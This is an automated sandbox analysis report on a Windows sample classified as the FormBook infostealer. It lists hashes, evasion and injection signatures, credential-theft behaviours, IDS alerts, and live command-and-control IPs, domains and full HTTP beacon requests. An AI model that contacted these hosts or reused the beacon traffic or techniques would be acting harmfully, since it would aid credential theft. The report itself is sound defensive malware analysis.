Windows Analysis Report
enkJ6J7dAn.exe

Overview

General Information

Sample name: enkJ6J7dAn.exe
renamed because original name is a hash value
Original sample name: 6cf789bf69a166e597d5befad3751a5153799bbcc4b1337b4c8f3af996b0650f.exe
Analysis ID: 1529036
MD5: dc1b0b674722f76e68cdfcd373c34ab9
SHA1: c6862db7bccf03b7e3a66f98cc05b4bf624cc9fa
SHA256: 6cf789bf69a166e597d5befad3751a5153799bbcc4b1337b4c8f3af996b0650f
Tags: exeuser-adrian__luca
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

barindex
Source: enkJ6J7dAn.exe ReversingLabs: Detection: 71%
Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.4588417399.0000000000680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2376344718.0000000005AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4589939639.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2375723470.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2374576384.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4590169358.0000000000B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4590296108.0000000000BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: enkJ6J7dAn.exe Joe Sandbox ML: detected
Source: enkJ6J7dAn.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: RmClient.pdbGCTL source: svchost.exe, 00000002.00000002.2374917499.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2374956046.0000000003019000.00000004.00000020.00020000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000003.00000002.4589350365.0000000000998000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: avmjQSNkeFbUoa.exe, 00000003.00000000.2259492562.000000000040E000.00000002.00000001.01000000.00000004.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000000.2442142227.000000000040E000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: wntdll.pdbUGP source: enkJ6J7dAn.exe, 00000000.00000003.2141666109.0000000004680000.00000004.00001000.00020000.00000000.sdmp, enkJ6J7dAn.exe, 00000000.00000003.2141537980.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2241727497.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2375121022.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2375121022.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2243530836.0000000003400000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000005.00000003.2377156797.0000000002C42000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000005.00000002.4590623216.0000000002F8E000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000005.00000002.4590623216.0000000002DF0000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000005.00000003.2374869041.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: enkJ6J7dAn.exe, 00000000.00000003.2141666109.0000000004680000.00000004.00001000.00020000.00000000.sdmp, enkJ6J7dAn.exe, 00000000.00000003.2141537980.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2241727497.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2375121022.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2375121022.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2243530836.0000000003400000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, RmClient.exe, 00000005.00000003.2377156797.0000000002C42000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000005.00000002.4590623216.0000000002F8E000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000005.00000002.4590623216.0000000002DF0000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000005.00000003.2374869041.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: RmClient.exe, 00000005.00000002.4591201110.000000000341C000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000005.00000002.4588947900.000000000096D000.00000004.00000020.00020000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000000.2442714328.00000000032CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2664524956.00000000006DC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: RmClient.exe, 00000005.00000002.4591201110.000000000341C000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000005.00000002.4588947900.000000000096D000.00000004.00000020.00020000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000000.2442714328.00000000032CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2664524956.00000000006DC000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: RmClient.pdb source: svchost.exe, 00000002.00000002.2374917499.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2374956046.0000000003019000.00000004.00000020.00020000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000003.00000002.4589350365.0000000000998000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00452492
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00442886
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_004788BD
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_004339B6
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose, 0_2_0045CAFA
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00431A86
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose, 0_2_0044BD27
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0045DE8F FindFirstFileW,FindClose, 0_2_0045DE8F
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_0044BF8B
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 5_2_0069C280 FindFirstFileW,FindNextFileW,FindClose, 5_2_0069C280
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 4x nop then xor eax, eax 5_2_00689A00
Source: C:\Windows\SysWOW64\RmClient.exe Code function: 4x nop then mov ebx, 00000004h 5_2_02CE04E1

Networking

barindex
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49863 -> 44.213.25.70:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49979 -> 206.119.82.134:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49979 -> 206.119.82.134:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49980 -> 67.223.117.189:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49986 -> 3.33.130.190:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49981 -> 67.223.117.189:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49998 -> 3.33.130.190:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50004 -> 133.130.35.90:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49988 -> 183.181.83.131:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49984 -> 3.33.130.190:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49997 -> 3.33.130.190:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50009 -> 3.33.130.190:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50010 -> 3.33.130.190:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49973 -> 206.119.82.134:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50013 -> 172.191.244.62:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50001 -> 154.212.219.2:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49983 -> 67.223.117.189:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49983 -> 67.223.117.189:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49982 -> 67.223.117.189:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49985 -> 3.33.130.190:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50003 -> 154.212.219.2:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50003 -> 154.212.219.2:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50023 -> 199.59.243.227:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50023 -> 199.59.243.227:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50015 -> 172.191.244.62:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50015 -> 172.191.244.62:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50021 -> 199.59.243.227:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50016 -> 162.241.244.106:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49993 -> 38.47.232.196:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50018 -> 162.241.244.106:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49994 -> 38.47.232.196:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50006 -> 133.130.35.90:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50005 -> 133.130.35.90:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49995 -> 38.47.232.196:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49995 -> 38.47.232.196:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50000 -> 154.212.219.2:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50014 -> 172.191.244.62:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50017 -> 162.241.244.106:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49978 -> 206.119.82.134:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49989 -> 183.181.83.131:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50020 -> 199.59.243.227:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49992 -> 38.47.232.196:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49991 -> 183.181.83.131:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49991 -> 183.181.83.131:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49990 -> 183.181.83.131:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50012 -> 172.191.244.62:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49996 -> 3.33.130.190:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49999 -> 3.33.130.190:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49999 -> 3.33.130.190:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50002 -> 154.212.219.2:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49987 -> 3.33.130.190:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49987 -> 3.33.130.190:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50011 -> 3.33.130.190:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50011 -> 3.33.130.190:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50022 -> 199.59.243.227:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50007 -> 133.130.35.90:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50007 -> 133.130.35.90:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49956 -> 206.119.82.134:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50008 -> 3.33.130.190:80
Source: Network traffic Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50019 -> 162.241.244.106:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50019 -> 162.241.244.106:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49863 -> 44.213.25.70:80
Source: DNS query: www.uburn.xyz
Source: DNS query: www.nakama2-sshl.xyz
Source: DNS query: www.lurknlarkk.xyz
Source: Joe Sandbox View IP Address: 172.191.244.62 172.191.244.62
Source: Joe Sandbox View IP Address: 67.223.117.189 67.223.117.189
Source: Joe Sandbox View IP Address: 154.212.219.2 154.212.219.2
Source: Joe Sandbox View ASN Name: ATT-INTERNET4US ATT-INTERNET4US
Source: Joe Sandbox View ASN Name: VIMRO-AS15189US VIMRO-AS15189US
Source: Joe Sandbox View ASN Name: COMING-ASABCDEGROUPCOMPANYLIMITEDHK COMING-ASABCDEGROUPCOMPANYLIMITEDHK
Source: Joe Sandbox View ASN Name: AMAZON-AESUS AMAZON-AESUS
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile, 0_2_004422FE
Source: global traffic HTTP traffic detected: GET /7mju/?ntHx=DVDDWR70P4Ux&nV=n/a1XNlERIMSMkzeywaNMrPIuUD1rrysoFUi8ENskqLMFqSk/Fj/a6kaQHlAIjdrNEumw+uIAi046Spw4+rc6qM4fhKpxjqsp0T9dbSaLHAdgBuOtHQwGARxDApDg0JQqA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.newdaydawning.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Source: global traffic HTTP traffic detected: GET /l8if/?nV=fb3YagVOau/9jH9KlQpUGbOr1Qdfq6yMjiH+G1UmZCjbhiKuBNxm8T0bbvZrtC77cOtGQaEUv2efn6v6V0Ivj11bpGL/ZxGuw2XpQMT5FisIZ1T3bTfJHsfnS4K0yfQKpg==&ntHx=DVDDWR70P4Ux HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.40wxd.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Source: global traffic HTTP traffic detected: GET /iqqs/?nV=f7Pu0FXPylRYdptnYM+M274MvaQkI0mPgPaD0QQYagT1MtyUkVhu56FZSrYHt1j8AD8LTP1JVeTQ4dQlBUKb6i2E7evasg+rZKL8K5GvfkdXq3aEhfRhQBOeogOLhyWDdw==&ntHx=DVDDWR70P4Ux HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.uburn.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Source: global traffic HTTP traffic detected: GET /eruc/?ntHx=DVDDWR70P4Ux&nV=0pHn1M2gwaL5mql+tyiDCW8+wEBXBUyoFGMXu3aa4qZIFhIZTp589V8RrAObS8se+RyZmJdkVQw9waSFdfaJSHRFZ9VRSgAmugrmpHJKo8BhJN8eoKLjgrj/d04fMg3yYg== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.o731lh.vipConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Source: global traffic HTTP traffic detected: GET /ui3j/?nV=Ezegw1wupX22aLPkoEEv7/ZO5DjzGXXdsNrfcd+vuVznJDvywH1CwnPb30ViPb7vM8PbtSzEB5D6DwhwIFVA8/Tr/xM1b+8LUYxrC0lZhY3XVqHkHg9ScVh1/tZdAIFMag==&ntHx=DVDDWR70P4Ux HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.nakama2-sshl.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Source: global traffic HTTP traffic detected: GET /ak5l/?ntHx=DVDDWR70P4Ux&nV=eH+SO6exUc8kNdksa1CSzQBVVc7aplBFnmpLKbW7uuUzt7F+3QY5ZMk8901G8pDK6ZYhQ7vTWV07p9++0dQhL3O0xstuwQMp3nW6pA5kKg3bBdr252Da+1tCwmPlqiVqcw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.zz82x.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Source: global traffic HTTP traffic detected: GET /b8ih/?nV=Odz4+FoaeIgH5S8BzuYjRriywjm3wUfEesAV9dDAx8uax8eIV9nl6gv+Nqhf7GxjMHuq3WRF/H9yecUAbTD81Bj6MrqplT1UHUL5zd01ssdakVPMNWHRSFmdvBITbtw3Bg==&ntHx=DVDDWR70P4Ux HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.tukaari.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Source: global traffic HTTP traffic detected: GET /6wpo/?nV=s9KIkrkzrqTbzkMlvbBfjAUuuxKvGdewBa6qLgEcFDzVo4ZyZuXCeDvxdW3wzkiXZ/4dwHLmTrOaI9mNhjMAeSSUnznUnGrbhm47OZW7gX2VGBRmOyGjZmEPzG32fut7kA==&ntHx=DVDDWR70P4Ux HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.prj81oqde1.buzzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Source: global traffic HTTP traffic detected: GET /p9u3/?nV=D1Jc/C1nh+BZL85aQihK2StkCXQN9YWXqdphFMmfowbAWgC+evwb7cYTziaUWePLaVULTAuSiJlrRgQRJK1EyuYNuFTcIXqGngDeSQ6xB8eOEHekfFMT1fbVeuWDNHI3uA==&ntHx=DVDDWR70P4Ux HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.komart.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
Source: global traffic HTTP traffic detected: GET /u6k6/?nV=dY5LfBxT8+4OTYgXKtZbNifUsoDX+uWzLeRRn9zdsxFld7n68myH2Gd2W2FS03HPt+W/9NATFibZyiY45uryUTVD4Y8PctWQGLDO40gge8F8TAbPjM2Na57q5AxIn0qb9A==&ntHx=DVDDWR70P4Ux HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.healthyloveforall.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
